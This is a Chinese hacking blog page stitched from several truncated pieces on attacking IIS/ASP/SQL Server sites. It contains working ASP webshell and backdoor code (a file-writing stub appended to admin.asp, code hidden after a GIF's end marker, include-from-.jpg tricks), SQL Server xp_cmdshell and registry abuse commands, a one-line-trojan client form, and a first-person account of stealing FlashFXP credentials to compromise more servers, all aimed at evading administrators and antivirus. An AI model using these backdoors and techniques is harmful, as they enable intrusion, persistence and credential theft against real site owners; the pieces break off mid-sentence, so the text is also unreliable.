古典辣M°的博客网

这段时间一直在家养病，人快疯了！回黑基随便逛逛。呵呵，发现一篇文章是ASP木马代码的。
看了看，突然想写点什么。也许是上面写的不完整吧。

第一步，修改密码：别人的马跟自己的区别第一个就是密码。
先把修改密码的地方找出来。代码如下：

if Epass(trim(request.form("password")))="qtjckgas3i" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>

重点在(trim(request.form("password")))="qtjckgas3i"有些人以为这就是前一个人的密码。
呵呵，生成一个ASP上传一试。怎样？不行吧。呵呵。密码是加密了的。

第二步，按自己的意愿美化网页。
有人喜欢白色，有人喜欢黑色。象我，我就喜欢网页里有音乐。所以把HTML代码嵌入ASP里。注意如果ASP学得不是很好的
建议最好放在最顶端这样对于整个程序的思路都很清晰，而且不会破坏ASP内部语法。代码可以为：

<bgsound src="音乐的地址" loop="播放的次数，-1为无限循环">

颜色的修改。
如：COLOR: #000000; Color后面的参数就是颜色对应的参数。如果对参数不是很了的，可以采用英语：Color:black;前面不加
“#”
当然了，美化可以根据自己的习惯来加，也可以加些特效脚本。不过我一般都只加音乐，多了就太花翘了，呵呵。

第三步，如何将原代码密码修改。
这步应该算第一步的补充吧，之所以放在后面单独说，因为他这里牵涉到一定的技术，也是本篇的精髓。"qtjckgas3i"这是被
加密过了的。是利用一个工具直接生成密码的。什么呢？呵呵，是段ASP代码。这里我给出源码希望大家能够学习一下。

<%
pass="yourpsw"
temppass=StrReverse(left(pass&"zxcvbnm,./",10))
templen=len(pass)
mmpassword=""
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,"’","B")
%>
<%=Epass%>

将上面的ASP代码COPY到记事本里，然后另存为asp的，传到ASP空间上。打开，呵呵，看到了什么？乱码？没错。这是利用ASP代码
直接导成WIN碎片格式的，假定我们想设置的密码是"hacker"就把他跟pass="yourpsw"里的"yourpsw"替换，然后生成ASP上传下到
空间，打开，这时候现实的就是我们加密后的密码：q_uxqeledm 这时候把原木马的PSW-"qtjckgas3i"给替换成我们加密后的密码
这样一个个性的ASP木马就出来了。登陆ASP木马时使用没有加密的密码登陆！

http://www.xf2s.com/bingo.asp大家可以看看这是我简单修改后的ASP木马
[face02]

[xp_cmdshell]
许多存储过程被创建在SQLSERVER中，执行各种各样的功能，例如发送电子邮件和与注册表交互。
Xp_cmdshell是一个允许执行任意的命令行命令的内置的存储过程。例如：
Exec master..xp_cmdshell ’dir’
将获得SQLSERVER进程的当前工作目录中的目录列表。
Exec master..xp_cmdshell ’net user’
将提供服务器上所有用户的列表。当SQLSERVER正常以系统帐户或域帐户运行时，攻击者可以做出更严重的危害。

[xp_regread]
另一个有用的内置存储过程是xp_regXXXX类的函数集合。
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite

这些函数的使用方法举例如下：
exec xp_regread HKEY_LOCAL_MACHINE,’SYSTEM\CurrentControlSet\Services\lanmanserver\parameters’, ’nullsessionshares’
这将确定什么样的会话连接在服务器上是可以使用的

exec xp_regenumvalues HKEY_LOCAL_MACHINE,’SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities’
这将显示服务器上所有SNMP团体配置。在SNMP团体很少被更改和在许多主机间共享的情况下，有了这些信息，攻击者或许会重新配置同一网络中的网络设备。

这很容易想象到一个攻击者可以利用这些函数读取SAM，修改系统服务的配置，使它下次机器重启时启动，或在下次任何用户登陆时执行一条任意的命令。

[其他存储过程]
xp_servicecontrol过程允许用户启动，停止，暂停和继续服务：
exec master..xp_servicecontrol ’start’,’schedule’
exec master..xp_servicecontrol ’start’,’server’
下表中列出了少量的其他有用的存储过程：
Xp_availablemedia 显示机器上有用的驱动器
Xp_dirtree 允许获得一个目录树
Xp_enumdsn 列举服务器上的ODBC数据源
Xp_loginconfig Reveals information about the security mode of the server
Xp_makecab 允许用户在服务器上创建一个压缩文件
Xp_ntsec_enumdomains 列举服务器可以进入的域
Xp_terminate_process 提供进程的进程ID，终止此进程

[Linked Servers]
SQL SERVER提供了一种允许服务器连接的机制，也就是说允许一台数据库服务器上的查询能够操作另一台服务器上的数据。这个链接存放在master.sysservers表中。如果一个连接的服务器已经被设置成使用’sp_addlinkedsrvlogin’过程，当前可信的连接不用登陆就可以访问到服务器。’openquery’函数允许查询脱离服务器也可以执行。

[Custom extended stored procedures]
扩展存储过程应用程序接口是相当简单的，创建一个携带恶意代码的扩展存储过程动态连接库是一个相当简单的任务。使用命令行有几个方法可以上传动态连接库到SQL服务器上，还有其它包括了多种自动通讯的通讯机制，比如HTTP下载和FTP脚本。
一旦动态连接库文件在机器上运行即SQL服务器能够被访问——这不需要它自己是SQL服务器——攻击者就能够使用下面的命令添加扩展存储过程（这种情况下，我们的恶意存储过程就是一个能输出服务器的系统文件的小的木马）：

Sp_addextendedproc ’xp_webserver’,’c:\temp\xp_foo.dll’
在正常的方式下，这个扩展存储过程可以被运行：
exec xp_webserver
一旦这个程序被运行，可以使用下面的方法将它除去：
xp_dropextendedproc ’xp_webserver’

[将文本文件导入表]
使用’bulk insert’语法可以将一个文本文件插入到一个临时表中。简单地创建这个表：
create table foo( line varchar(8000) )
然后执行bulk insert操作把文件中的数据插入到表中，如：
bulk insert foo from ’c:\inetpub\wwwroot\process_login.asp’

可以使用上述的错误消息技术，或者使用’union’选择，使文本文件中的数据与应用程序正常返回的数据结合，将数据取回。这个用来获取存放在数据库服务器上的脚本源代码或者ASP脚本代码是非常有用的。

[使用bcp建立文本文件]
使用’bulk insert’的相对技术可以很容易建立任意的文本文件。不幸的是这需要命令行工具。’bcp’,即’bulk copy program’
既然 bcp可以从SQL服务进程外访问数据库，它需要登陆。这代表获得权限不是很困难，既然攻击者能建立，或者利用整体安全机制(如果服务器配置成可以使用它)。

命令行格式如下：
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
’S’参数为执行查询的服务器，’U’参数为用户名，’P’参数为密码，这里为’foobar’

[ActiveX automation scripts in SQL SERVER]
SQL SERVER中提供了几个内置的允许创建ActiveX自动执行脚本的存储过程。这些脚本和运行在windows脚本解释器下的脚本，或者ASP脚本程序一样——他们使用VBScript或JavaScript书写，他们创建自动执行对象并和它们交互。一个自动执行脚本使用这种方法书写可以在Transact-SQL中做任何在ASP脚本中，或者WSH脚本中可以做的任何事情。为了阐明这鞋，这里提供了几个例子：

（1）这个例

第一次翻译，水平有限，难免有错，请不吝指正。转载请保留信息完整。

摘要：
这份文档是详细讨论SQL注入技术，它适应于比较流行的IIS+ASP+SQLSERVER平台。它讨论了哪些SQL语句能通过各种各样的方法注入到应用程序中，并且记录与攻击相关的数据确认和数据库锁定。

这份文档的预期读者为与数据库通信的WEB程序的开发者和那些扮演审核WEB应用程序的安全专家。

介绍：
SQL是一种用于关系数据库的结构化查询语言。它分为许多种，但大多数都松散地基于美国国家标准化组织最新的标准SQL-92。典型的执行语句是query，它能够收集比较有达标性的记录并返回一个单一的结果集。SQL语言可以修改数据库结构（数据定义语言）和操作数据库内容（数据操作语言）。在这份文档中，我们将特别讨论SQLSERVER所使用的Transact-SQL语言。
当一个攻击者能够通过往query中插入一系列的sql语句来操作数据写入到应用程序中去，我们管这种方法定义成SQL注入。

一个典型的SQL语句如下：
Select id,forename,surname from authors
这条语句将返回authors表中所有行的id，forename和surname列。这个结果可以被限制，例如：
Select id,forename,surname from authors where forename’john’ and surname=’smith’
需要着重指明的是字符串’john’和’smith’被单引号限制。明确的说，forename和surname字段是被用户提供的输入限制的，攻击者可以通过输入值来往这个查询中注入一些SQL语句，
如下：
Forename：jo’hn
Surname：smith
查询语句变为：
Select id,forename,surname from authors where forename=’jo’hn’ and surname=’smith’
当数据库试图去执行这个查询时，它将返回如下错误：
Server：Msg 170, Level 15, State 1, Line 1
Line 1：Incorrect syntax near ’hn’
造成这种结果的原因是插入了.作为定界符的单引号。数据库尝试去执行’hn’，但是失败。如果攻击者提供特别的输入如：
Forename：jo’;drop table authors—
Surname：
结果是authors表被删除，造成这种结果的原因我们稍后再讲。

看上去好象通过从输入中去掉单引号或者通过某些方法避免它们都可以解决这个问题。这是可行的，但是用这种方法做解决方法会存在几个困难。第一，并不是所有用户提供的数据都是字符串。如果用户输入的是通过用户id来查询author，那我们的查询应该像这样：
Select id,forename,surname from authors where id=1234
在这种情况下，一个攻击者可以非常简单地在数字的结尾添加SQL语句，在其他版本的SQL语言中，使用各种各样的限定符号；在数据库管理系统JET引擎中，数据可以被使用’#’限定。第二，避免单引号尽管看上去可以，但是是没必要的，原因我们稍后再讲。

我们更进一步地使用一个简单的ASP登陆页面来指出哪些能进入SQLSERVER数据库并且尝试鉴别进入一些虚构的应用程序的权限。
这是一个提交表单页的代码，让用户输入用户名和密码：
<HTML>
<HEAD>
<TITLE>Login Page</TITLE>
</HEAD>

<BODY bgcolor=’000000’ text=’cccccc’>
<FONT Face=’tahoma’ color=’cccccc’>
<CENTER><H1>Login</H1>
<FORM action=’process_loginasp’ method=post>
<TABLE>
<TR><TD>Username：</TD><TD><INPUT type=text name=username size=100 width=100></TD></TR>
<TR><TD>Password：</TD><TD><INPUT type=password name=password size=100 withd=100></TD></TR>
</TABLE>
<INPUT type=submit value=’Submit’><INPUT type=reset value=’Reset’>
</FORM>
</Font>
</BODY>
</HTML>
下面是process_login.asp的代码，它是用来控制登陆的：
<HTML>
<BODY bgcolor=’000000’ text=’ffffff’>
<FONT Face=’tahoma’ color=’ffffff’>
<STYLE>
p { font-size=20pt ! important}
font { font-size=20pt ! important}
h1 { font-size=64pt ! important}
</STYLE>
<%@LANGUAGE = JScript %>
<%
function trace( str ) {
if( Request.form("debug") == "true" )
Response.write( str );
}
function Login( cn ) {
var username;
var password;
username = Request.form("username");
password = Request.form("password");
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = ’" + username + "’ and password = ’" + password + "’"; trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF) {
rso.close();
%>
<FONT Face=’tahoma’ color=’cc0000’>
<H1> <BR><BR>
<CENTER>ACCESS DENIED</CENTER>
</H1>
</BODY>
</HTML>
<% Response.end return; }
else {
Session("username") = "" + rso("username");
%>
<FONT Face=’tahoma’ color=’00cc00’>
<H1> <CENTER>ACCESS GRANTED<BR> <BR>
Welcome, <% Response.write(rso("Username")); Response.write( "</BODY></HTML>" ); Response.end }
}
function Main() { //Set up connection

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>一句话木马客户端发送程序 - By MonMon</title>
</HEAD>
<BODY style="font-size:9pt">
<FORM method=post name=frm target=_blank>
Address:
<Input name=act size=65 style="Border:1px solid; FONT-SIZE: 9pt" value="http://www.Site.com/URL.asp">
Parameter:
<Input name=para size=11 style="Border:1px solid; FONT-SIZE: 9pt" value="cmd">
<BR><BR>
Content Send: <input type=Button value="+" onClick="tmpcmd.rows=tmpcmd.rows+1" style="width:20px;height:20px"> <input type=Button value="-" onClick="if(tmpcmd.rows>1)tmpcmd.rows=tmpcmd.rows-1" style="width:20px;height:20px">
<BR>
<TextArea cols=100 name=tmpcmd rows=10 style="Border:1px solid; FONT-SIZE: 9pt">
for i=1 to 5
response.write i&"<BR>"
next
</TEXTAREA>
<BR><BR>
Attachment Code (Input box name: Attachment): <input type=Button value="+" onClick="Attachment.rows=Attachment.rows+1" style="width:20px;height:20px"> <input type=Button value="-" onClick="if(Attachment.rows>1)Attachment.rows=Attachment.rows-1" style="width:20px;height:20px">
<BR>
<TextArea cols=100 name=Attachment rows=10 style="Border:1px solid; FONT-SIZE: 9pt"></TEXTAREA>
<BR><BR>
<Input name=Send onclick="Javascipt:frm.tmpcmd.name=frm.para.value;frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=’tmpcmd’" type=Button value="Send Script">
</FORM>
</BODY></HTML>

脚本入侵中往往会上传一个asp木马来进一步扩大权限，或者在肉鸡中留一个asp后门也是一个不错的选择。但是如何让asp木马更加隐匿和强大，从而躲过网管查杀逃过杀毒软件追杀，并且具备system权限呢？改变代码变量也许是一个解决问题的办法，但是我们不如换个角度思考，何不尝试改变asp木马的运行方式？
首先，我们可以换个任意后缀来运行asp木马。换任意后缀来运行asp文件方法有两种，一种是include指令的使用。include指令可以让我们直接调用位于其它文件的函数，而不管后缀名是什么。像我写了一个简单的asp木马，功能是遍历c:盘，源码如下：
<%Set oScript = Server.CreateObject("WSCRIPT.SHELL") oScript.Run ("cmd.exe /c dir c:\ > c:\lcx.txt ") %>
我们可以将这段源码保存成1.jpg，然后将这句指令<!--#include file="1.jpg"-->放在2.asp文件的文件头或文件尾，那么我们执行2.asp时，放在2.asp同目录下的1.jpg同样也会被调用，起到遍历c:的功能即在c:下生成lcx.txt这一文件。第二种方法是iis管理器中用asp.dll来解析任意后缀。在iis默认安装情况下，我们可以查觉asa、cer、cdx后缀也可以成功运行asp代码，因为这三种后缀的文件映射都是调用了系统的asp.dll。根据这一启示，我们可以做一个.lcx的后缀映射，用nt\system32下的asp.dll来解析，这样做完后写有asp源码的lcx后缀文件也会成功运行asp程序。其方法是依次打开电脑的控制面板－管理工具－Internet 服务管理器－web站点－右键属性－主目录－配置－添加。图1。
其次，我们可以让asp木马来触发才运行。无论你的asp木马写得多么好，基本总会调用到WSCRIPT.SHELL和Scripting.FileSystemObject这两个对象。有经验的网管可以运行查找功能，让你的木马无处可逃。（这里我也顺便给大家提供一个启明星工作室编写的查找asp木马的工具，见附件）我们能不能做到调用这两个对象的asp木马不放在肉鸡上，需要时能够随时上传运行呢？runasp.asp是一个用asp实现asp文件的运行的脚本，虽然还有很多bug，但是对我们调用执行asp木马是足够用了。更为可怕的是我在runasp.asp里调用测试一些恶意代码时，居然躲过了瑞星的查杀。图2。（由于runasp.asp代码太多，文章里不方便列出，我已将其放在附件里了，大家可以自己研究一下）我们将runasp.asp放在肉鸡上是不是一个很好的asp触发器后门呢？另外，对付粗心的网管我们还可以将这样一段代码放在asp文件里：
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你要插入的asp文件名?id=1">
<input type="text" size="20" name="Name"
value=<%=server.mappath("xp.asp")%>>
<textarea name="Message" class=input>
</textarea>
<input type="submit" name="Send" value="生成" class=input>
</form>
<% end if%>
像我放在动网文章的admin.asp的文件尾端，当网管运行http://动网文章url/admin.asp时并没有引起丝毫变化，而当我们运行http://动网文章url/admin.asp?id=1时，就可以根据我们的需要生成任意asp木马文件了。
最后，我们要让asp木马具备系统权限。我们的木马现在隐匿得很深，躲过了细心网管和杀毒软件，不具备系统权限我们心有不甘。让asp木马具备系统权限的方法有三种，第一种是在iis管理器中的主目录选项里将应用程序保护选择为:低(iis进程)图3。第二种是将"IWAM_machine"这一用户加入administrators组即可。这两种方法我想大家也许都耳熟能详了，但第3种也许就不为人所知了。netbox是一款由北京综艺达软件技术有限公司自主研制的编译及开发工具，除了Apache和微软的IIS以外，目前是世界上第三个可以运行asp的应用服务器，在Windows98/NT/2000/Me/XP下都可以直接运行，而且是一个大小仅为440kb的绿色文件。我已将netbox配置好了（请见附件的netbox文件夹)，大家使用的时候，只需将netbox文件夹放在某个盘符下，再在cmd下运行"x:\netbox\netbox.exe -install"即可安装成功netbox，以后就可以运行http://ip:88/x.asp了。需要指出的是我在netbox的配置文件里main.box里写了这样两行代码：
If httpd.Create("", 88) = 0 Then
Set host = httpd.AddHost("", "\wwwroot")
意思是web的端口为88，asp文件放在netbox目录下的wwwroot文件夹。这个端口和文件夹，你都可以根据自己的需要用记事本打开main.box来修改你所想要的。我们使用这一软件最大的一个好处是我们的asp木马在netbox环境下具备了系统权限，也许用它在肉鸡上做主页留后门也是一个不错的选择哟。
另外，因为我整篇文章写得是如何突破常规限制来运行asp木马，所以还有一点我要提及。在黑客防线2003年7期xhacker有篇文章《巧妙设置cmd权限加强主机安全配置》提到过防止网上流行的cmd.asp木马（见附件）方法是可

----------------------------------------
现在从注入拿WEBSHELL看来成功率都比较高了。
拿到SHELL后，安装自己的脚本后门，常常被查杀。

脚本后门的发展史：
1。最开始就是直接放一个ASP文件上去。
2。把ASP文件加密才放上去。
3。把脚本插入到代码中去。（我经常用这种）

不过一样被查得出来，我前段时候手工检测一个站的脚本安全。
发现这个站被种了21个木马。
所以我就想到了，怎么样才能不被发现不能被查杀。

最后我研究了一下如果把脚本插入到图片中。
然后在ASP中调用图片中的脚本程序应该就可以了。

测试的时候通过了。
现在我把我的心德写一下。
让大家来分析一下。共同进步和完善这种方法。


在研究过程中我看了GIF图片的结构文档方面的书。
GIF图片都是以 00 3B 为结束的。
换句话说00 3B 后面的不会显示出来。
所以我们在00 3B后面插入代码就行了。
当然代码我们加密放到图片中去效果更好。

我写了一个程序来这么做。

这里要说一下，在图片中00 3B后面的是不会显示出来的。
但其中的代码已经运行了。图片也会正常显示出来。

测试：
在图片后面加入：<%=now%>
然后在一个ASP文件中加入:<!--#include file="aaa.gif" -->

然后你们下载这个图片，发现图片最后面变成了时间。很正常因为图片放到了ASP脚本中运行了其中的代码。

换句话来说，如果写的是一段生成文件的脚本。
那么我们提交特定的参数让图片中的代码去生成文件。
这样就实现了我们的后门。

1：这种方法要做的工作就是在目标站点中找一张GIF图片然后把代码插入到图片中，再上传到站点中去。这样作管理员很难找到木马在哪里。打死也想不到木马在图片中。
2：我们插入的代码只有一行就是那个include file .....
找个文件大点的ASP文件给插进去就行了。

然后我们在本地POST数据提交给ASP引用图片的URL这样就完成了工作。

我的插入图片的脚本：

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set objCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>

这段代码主要就是在当前目录下生成一个ok.asp文件。
文件内容是由我们提交的数据.用request("cyfddata")来获取的。

这段代码加密后插入到图片中去。
下面我把我程序的代码贴出来。（倒程序代码没有打包在里面。明天再贴上来）
现在给程序地址下载：
点这里下载测试程序。

本地自己构建一个提交表单向ASP文件提交(加入图片那个文件)
表单文本框输入内容名称是:cyfddata

后感：
我本人认为这种方法，管理员很难查到。这是我两天前想到的作出来了，
可能有些问题希望和大家一起讨论，必竞，为了追求技术就得研究技术。
共享知识，从而升华。
感觉去研究一些新东西，人活得更XS些。


备注：　我的困惑

第一．　知道了怎么把图片后加：<%=now%> ，　可是这个时候图片成乱码了，　不能正常显示
第二．　我访问的时候，　是访问.gif 还是 .asp ?
第三．　bobo做了实验，　没有成功，　不知道什么地方出问题了
[face12]还是太菜了

最近各位一定得到不少肉鸡吧:)，从前段时间的动网的upfile漏洞， 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下asp脚本的后门罢了。至于提升权限的问题 呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很BT，你的asp木马可能都用不了，还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自己的妙招了。
其一，如果服务器上有装了pcanywhere服务端，管理员为了便于管理也给了我们方便，到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二，如果对方有Serv-U大家不要骂我啊，通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问题吧。
其三，通过替换系统服务来提升。
其四，查找conn和config这类型的文件看能否得到sa或者mysql的相关密码，可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法，使用Flashfxp也能提升权限，但是成功率高不高就看你自己的运气了:)
本人在www.xxx.com 通过bbs得到了一个webshell，放了个小马(现在海阳的名气太大了偶不敢放)，而且已经将一段代码插入了N个文件中，够黑吧。提升权限没时间做。在我放假回家后，一看我晕bbs升级到动网sp2了我放的小马也被K了，人家的BBS是access版本的。郁闷啊！突然想起我将一个页面插入了asp的后门，看看还有没有希望了。输入www.xxx.com/xx.asp?id=1 好家伙，还在！高兴ing
图1
于是上传了一个asp的脚本的后门，怎么提升权限呢?
在这个网站的主机上游荡了N分钟，在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2，于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名，而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3，点击连接。通过了于是我们又有了一堆肉鸡，我们有ftp权限。上传脚本木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急，大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。可惜啊！
又想起了在Sites.dat中也显示了密码和用户名，而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件，就是xp星号密码查看器，通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码，还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息，按社会工程学的概念来说，没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到的。
我想这个问题应该反馈到flashfxp官方，让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到flashfxp的时候能想到这个方法，至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。
[face42]

今天看了两篇好文章，在研究怎么把脚本插入图片．
[glow=255,red,2]好象不能成功．．　否则为什么现在一片沉默呢[/glow]